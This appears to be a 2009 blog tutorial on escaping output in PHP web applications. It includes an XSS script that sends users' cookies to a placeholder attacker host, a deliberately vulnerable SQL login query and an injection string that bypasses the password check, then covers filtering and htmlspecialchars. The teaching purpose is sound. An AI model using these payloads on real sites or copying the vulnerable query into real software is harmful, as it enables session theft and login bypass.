  • ESCAPE OUTPUT Part 1

    Posted on March 28th, 2009 by admin

    Why Escape?

    So, you run a Web-based forum, and you don’t have a problem with users entering the occasional HTML tag. Why should you escape your output? Here’s why: Suppose this forum allows users to enter HTML tags. That’s fair enough, since you may want to let them enter bold-faced or italicized text. But the forum then outputs everything in its raw form, so every HTML tag a user types gets interpreted by the web browser. What if a user enters the following?

    <script>
    location.href='http://evil-example.org/steal-cookies.php?cookies=' + document.cookie;
    </script>

    Any subsequent user who is logged into the forum and visits this page will be redirected to http://evil-example.org/steal-cookies.php, with the cookies set by the forum passed along in the query string, where the attacker can steal them.

    Let’s look at another example. Many sites contain login forms, which usually consist of two fields: a username and a password. When a user submits them, the application may insert the values directly into an SQL statement, as in the following:

    $sql = "SELECT * FROM users
        WHERE username = '{$_POST['username']}'
        AND password = '{$_POST['password']}'";

    This statement works fine as long as a user enters a proper username and password, but suppose a user enters something like "example' OR 1 = 1; --" as the username? Since the user properly closed the single quote in the statement, the OR clause is treated as part of the SQL. Because 1 always equals 1, the condition is true for every row, and everything after the -- is ignored as a comment (at least in most database engines), including the password check. Thus, the user is able to log in without an account.
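    To make the effect concrete, here is a minimal sketch that builds the same statement from the malicious username and prints the resulting SQL. The `$post` array is a hypothetical stand-in for `$_POST` so the snippet can run from the command line; nothing is sent to a database.

```php
<?php
// Hypothetical stand-in for $_POST, holding the attacker's input.
$post = array(
    'username' => "example' OR 1 = 1; --",
    'password' => '',
);

// Same interpolation as the statement above (vulnerable on purpose).
$sql = "SELECT * FROM users
    WHERE username = '{$post['username']}'
    AND password = '{$post['password']}'";

// Print the query the database would receive.
echo $sql, "\n";
```

    In the printed query, the quote after "example" ends the string literal early, so the rest of the username is read as SQL rather than as data.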

    The first step in preventing situations such as these is to filter all input so that no unexpected characters appear in the data.
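    As a rough illustration of filtering, the sketch below accepts a username only if it matches a whitelist pattern. The function name `filter_username` and the rule itself (3 to 20 letters, digits, or underscores) are assumptions made for this example; a real forum would choose its own rules.

```php
<?php
// Hypothetical rule: usernames are 3 to 20 letters, digits, or underscores.
// Returns the value unchanged if it passes, or null if it does not.
function filter_username($value)
{
    if (!is_string($value)) {
        return null;
    }
    // The D modifier keeps $ from matching before a trailing newline.
    if (preg_match('/^[A-Za-z0-9_]{3,20}$/D', $value) !== 1) {
        return null;
    }
    return $value;
}

var_dump(filter_username('alice_01'));
var_dump(filter_username("example' OR 1 = 1; --"));
```

    Note that the filter rejects bad input rather than trying to repair it, so the injected username from the login example never reaches the SQL statement.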

    After filtering, be sure to save the raw data. Do not escape it before storing. If it is escaped before storing, it may be necessary to unescape it at some point in the future. For example, what if the data is escaped for HTML output and stored in a database table, only to be retrieved later for output as XML or PDF? Then it must be unescaped to move it to those formats, and possibly escaped again to suit the new output medium. This process is bound to introduce more bugs into your code and is likely to reduce the quality of the data. Thus, to make the most of your data, it is best to save it raw (after filtering) and escape only when outputting.

    Escaping output is not a terribly difficult process. It may require a few extra lines of code, or simply a little more attention to detail. The important thing to keep in mind is the output format and the special characters that need to be escaped for that format. For the purposes of this discussion, I will cover escaping for HTML and SQL, since PHP has excellent built-in functions for handling output to these formats.
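    For the HTML case, a minimal sketch of escaping at output time might look like the following. It uses PHP's built-in `htmlspecialchars()`; the wrapper name `escape_html` and the choice of `ENT_QUOTES` with UTF-8 are assumptions for this example, and SQL escaping is not shown here.

```php
<?php
// Raw value, kept unescaped in storage as recommended above.
$comment = "<script>location.href='http://evil-example.org/steal-cookies.php?cookies=' + document.cookie;</script>";

// Hypothetical helper: escape a value for an HTML context at output time.
function escape_html($value)
{
    // ENT_QUOTES converts both single and double quotes to entities.
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// The browser now displays the tag as text instead of running it.
echo '<p>', escape_html($comment), "</p>\n";
```

    Because the stored value stays raw, the same `$comment` can later be escaped differently for another output format without first undoing the HTML escaping.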
